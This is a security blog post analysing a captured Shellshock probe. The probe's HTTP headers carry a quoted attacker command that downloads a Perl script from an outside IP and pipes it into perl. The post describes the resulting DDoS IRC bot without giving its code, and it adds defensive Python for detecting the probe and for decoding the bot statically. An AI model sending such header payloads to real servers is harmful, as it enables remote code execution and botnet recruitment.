Attack of the Day

My New Toy

** Standard Warnings Apply **
Let me help you understand..

Interesting attack for today…  The attack vector on this one is pretty much like the hundreds of others I’ve seen today: a Shellshock probe, with the bash function-definition prefix (`() { :; };`) stuffed into several HTTP headers in the hope that a CGI script on the far end hands those headers to a vulnerable bash as environment variables.  The payload is fetched with curl and piped straight into perl, so nothing has to be written to disk.  Assuming they found an open system, they wanted to make sure I received a copy of something.

GET /cgi-bin-sdb/printenv HTTP/1.0
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Cookie: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl 
Referer: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl 
User-Agent: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl 
Test: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl 
X-Forwarded-For: 72.249.118.225
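To pick this kind of probe out of a pile of captured requests, here is a small checker I wrote for this post (added example, not code from the attacker or from any tool on this page). It splits a raw HTTP/1.x request into headers, flags every header whose value starts with the Shellshock function-definition prefix, and pulls out the command and any URLs in it so the dropper location can be blocked or fetched for analysis. The request above is used as sample input; the second, benign request is constructed for comparison.

```python
import re

# Bash function-definition prefix that triggered the Shellshock bugs
# (CVE-2014-6271 and its follow-ups): "() {" + a body + "};" and then
# whatever the attacker wants bash to run when it imports the variable.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{[^}]*\}\s*;\s*(?P<cmd>.*)$')
URL_RE = re.compile(r"https?://[^\s\"'|;&<>]+")


def parse_request(raw):
    """Split a raw HTTP/1.x request into (request line, {header: value})."""
    lines = raw.strip('\n').split('\n')
    request_line = lines[0].strip()
    headers = {}
    for line in lines[1:]:
        if not line.strip():          # blank line ends the header block
            break
        name, _, value = line.partition(':')
        headers[name.strip()] = value.strip()
    return request_line, headers


def find_shellshock(raw):
    """Return (request line, [hit, ...]) for every header carrying the prefix.

    Each hit records the header name, the command bash would execute, and
    any URLs in that command (the dropper locations worth blocking/fetching).
    """
    request_line, headers = parse_request(raw)
    hits = []
    for name, value in headers.items():
        m = SHELLSHOCK_RE.search(value)
        if m:
            cmd = m.group('cmd').strip()
            hits.append({'header': name, 'command': cmd, 'urls': URL_RE.findall(cmd)})
    return request_line, hits


# The probe from the post above, as captured (trailing spaces stripped).
SAMPLE_REQUEST = """
GET /cgi-bin-sdb/printenv HTTP/1.0
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Cookie: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl
Referer: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl
User-Agent: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl
Test: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl
X-Forwarded-For: 72.249.118.225
"""

# A constructed benign request for comparison (not from the post).
CLEAN_REQUEST = """
GET /cgi-bin/printenv HTTP/1.0
User-Agent: Mozilla/5.0 (X11; Linux x86_64)
Accept: */*
"""

if __name__ == '__main__':
    for raw in (SAMPLE_REQUEST, CLEAN_REQUEST):
        request_line, hits = find_shellshock(raw)
        print(request_line, '->', len(hits), 'Shellshock header(s)')
        for hit in hits:
            print('  %-11s %s' % (hit['header'], hit['command']))
```

Note that the target path matters as much as the headers: `printenv` is a CGI script, and CGI is exactly the place where a web server turns request headers into environment variables for a child process, which is what bash then mis-parses.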

Now, I felt kind of bad since they didn’t exploit the system and it looks like they *really* wanted me to have that file.  Of course, I grabbed a copy so they felt like their efforts were appreciated. The content delivered by index.cgi was a fairly large Perl script that was exactly 3 lines long. The important one is below.

eval ( decode_base64('LotsOfBase64EncodedStuffs'));

Always the curious one, I had to decode that. It ended up being a v1.0 DDoS Perl bot. The IRC server they used for command and control was near the top and very easy to find. They had the channel admins listed in there, also.  Looks like it would have been a pretty decent bot.

######################################################################################################################
######################################################################################################################
##  DDoS Perl IrcBot v1.0 / 2012 by DDoS Security Team       ## [ Help ] ###########################################
##      Stealth MultiFunctional IrcBot writen in Perl          #######################################################
##        Teste on every system with PERL instlled             ##  !u @system                                       ##
##                                                             ##  !u @version                                      ##
##     This is a free program used on your own risk.           ##  !u @channel                                      ##
##        Created for educational purpose only.                ##  !u @flood                                        ##
## I'm not responsible for the illegal use of this program.    ##  !u @utils                                        ##
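Decoding a dropper like this should never involve running it. Here is the static approach I use, written for this post (added example, not the bot's code and not any tool the attackers used): peel the `eval(decode_base64('...'))` wrapper layer by layer with Python's base64 module, then grep the innermost Perl for the C2 settings. The bot body below is a constructed stand-in, and the variable names it looks for (`$server`, `$port`, `@channels`, `@admins`) are assumptions modelled on common Perl IRC bots; the real bot's names are not shown above.

```python
import base64
import re

# eval(decode_base64('...')) with any spacing, e.g. "eval ( decode_base64('...'));"
EVAL_B64_RE = re.compile(
    r"eval\s*\(\s*decode_base64\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)\s*\)")


def unwrap_eval_base64(script, max_layers=10):
    """Peel eval(decode_base64(...)) wrappers statically, never running Perl.

    Returns [outer script, decoded layer 1, decoded layer 2, ...]; stops when
    the innermost layer no longer has such a wrapper or max_layers is reached.
    """
    layers = [script]
    for _ in range(max_layers):
        m = EVAL_B64_RE.search(layers[-1])
        if not m:
            break
        blob = re.sub(r'\s+', '', m.group(1))       # tolerate wrapped blobs
        layers.append(base64.b64decode(blob).decode('latin-1'))
    return layers


# Assumed variable names, modelled on what Perl IRC bots of this family
# commonly use; the real bot's names are not shown in the post.
IRC_FIELDS = {
    'server':   re.compile(r"\$(?:server|ircserver|host)\s*=\s*['\"]([^'\"]+)['\"]", re.I),
    'port':     re.compile(r"\$port\s*=\s*['\"]?(\d+)", re.I),
    'channels': re.compile(r"\@chan(?:nel)?s?\s*=\s*\(([^)]*)\)", re.I),
    'admins':   re.compile(r"\@admins?\s*=\s*\(([^)]*)\)", re.I),
}
QUOTED = re.compile(r"['\"]([^'\"]+)['\"]")


def extract_irc_config(perl_src):
    """Pull the C2 settings out of decoded bot source with plain regexes."""
    cfg = {}
    for key, rx in IRC_FIELDS.items():
        m = rx.search(perl_src)
        if m:
            cfg[key] = QUOTED.findall(m.group(1)) if key in ('channels', 'admins') else m.group(1)
    return cfg


# Constructed stand-in for the bot body (not the real one), base64-wrapped
# into a three-line dropper shaped like the one the post describes.
INNER_BOT = """#!/usr/bin/perl
my $server = 'irc.example.net';
my $port = '6667';
my @channels = ("#lobby");
my @admins = ("op1", "op2");
"""
DROPPER = "#!/usr/bin/perl\nuse MIME::Base64;\neval ( decode_base64('%s'));\n" % (
    base64.b64encode(INNER_BOT.encode()).decode())


def triage(dropper):
    """Return (number of layers peeled, C2 config found in the last layer)."""
    layers = unwrap_eval_base64(dropper)
    return len(layers) - 1, extract_irc_config(layers[-1])


if __name__ == '__main__':
    depth, cfg = triage(DROPPER)
    print('layers peeled:', depth)
    for key, value in cfg.items():
        print('  %-9s %s' % (key, value))
```

The regex only handles a literal base64 string inside the eval; if a sample builds the string from variables or adds a second encoding, the last layer returned will still be the wrapper and the config extraction will come back empty, which is the signal to go read the Perl by hand.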
